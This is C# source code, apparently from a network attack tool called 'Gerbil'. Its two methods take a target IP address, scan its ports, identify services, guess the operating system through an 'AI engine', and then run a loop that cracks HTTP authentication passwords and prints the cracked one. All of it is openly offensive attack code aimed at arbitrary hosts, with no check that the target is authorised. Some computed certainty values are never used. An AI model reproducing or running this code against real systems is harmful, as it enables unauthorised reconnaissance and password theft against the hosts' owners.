/// <summary> /// Launches an attack on a specific IP address. /// </summary> /// <param name="ipAddress">IP address or relative hostname to target.</param> public static void begin(string ipAddress, int timeout) { // Scan device for open ports Out.writeln("Probing ports..."); int[] openPorts = Gerbil_Scanners.PortScanner.scan(ipAddress, 0, 1000, timeout); if (openPorts.Length > 0) { for (int i = 0; i < openPorts.Length; i++) { Out.writeln("Found port: " + openPorts[i]); } } else { Out.writeln("No open ports found for the specified host and port range."); return; } // Get list of services Out.writeln("Looking up port definitions..."); string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts); if (openServices.Length > 0) { Out.writeln("Found service: "); foreach (string i in openServices) { Out.writeln(i); } } else { Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'"); return; } // Generate server information using AI engine if (openServices.Contains("NETBIOS")) { string devName = ""; devName = Dns.GetHostEntry(ipAddress).HostName; Out.writeln("NETBIOS Name: " + devName); } // Forward found services to the AI engine and get server OS //TODO: forward training parameter Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true); float ct = osr.getCertainty(); ct = ct * 10.0f; Out.writeln("OS Guess: " + osr.getName()); Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty())); // Guess more data based on running services // HTTP if (openServices.Contains("HTTP")) { // Attempt an HTTP attack if (In.securePrompt("Pathfinder", "HTTP Auth Password Crack")) { int pLength = In.prompt <int>("Maximum length of password"); Out.writeln("Cracking password..."); Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(ipAddress, pLength); while (true) { Out.write("*"); Gerbil.Attackers.AttackerResult AR; try { AR = HAA.stab(); } catch (Exception e) { // Error occured, break. break; } if (AR == Attackers.AttackerResult.Trying) { // Continue } else if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection) { Out.writeln("\nFailed to crack password using given parameters."); break; } else if (AR == Attackers.AttackerResult.Connected) { Out.blank(); Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString())); break; } } } } // Launch attacks }
private static void attackDeviceAuto(ref Database <Data.Models.Devices.Device> DBref, string devID, int pingTimeout) { Out.blank(); // Get data from DB string address = DBref.Read(devID).getDeviceIPAddress().ToString(); // Scan device for open ports Out.writeln("Probing known ports on " + address + "..."); int[] knownPorts = Gerbil_PortServices.PortLookup.getPorts(); List <int> tempFoundPorts = new List <int>(); foreach (int i in knownPorts) { if (Gerbil_Scanners.PortScanner.scan(address, i, pingTimeout)) { tempFoundPorts.Add(i); Out.writeln(i + ": OPEN"); } else { Out.writeln(i + ": CLOSED"); } } int[] openPorts = tempFoundPorts.ToArray(); if (openPorts.Length == 0) { Out.writeln("No open ports found for the specified host and port range."); return; } // Get list of services Out.writeln("Looking up port definitions..."); string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts); if (openServices.Length > 0) { Out.writeln("Found service: "); foreach (string i in openServices) { Out.writeln(i); } } else { Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'"); return; } if (openServices.Contains("NETBIOS")) { string devName = ""; devName = Dns.GetHostEntry(address).HostName; Out.writeln("NETBIOS Name: " + devName); } // Forward found services to the AI engine and get server OS //TODO: forward training mode parameter Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true); float ct = osr.getCertainty(); ct = ct * 1000.0f; Out.writeln("OS Guess: " + osr.getName()); Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty())); // Guess more data based on running services // HTTP if (openServices.Contains("HTTP")) { // Attempt an HTTP attack if (In.securePrompt("AttackMethods", "HTTP Auth Password Crack")) { int pLength = In.prompt <int>("Maximum length of password"); Out.writeln("Cracking password..."); Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(address, pLength); while (true) { Out.write("*"); Gerbil.Attackers.AttackerResult AR; try { AR = HAA.stab(); } catch { // Error occured, break. break; } if (AR == Attackers.AttackerResult.Trying) { // Continue } else if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection) { Out.writeln("\nFailed to crack password using given parameters."); break; } else if (AR == Attackers.AttackerResult.Connected) { Out.blank(); Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString())); break; } } } } }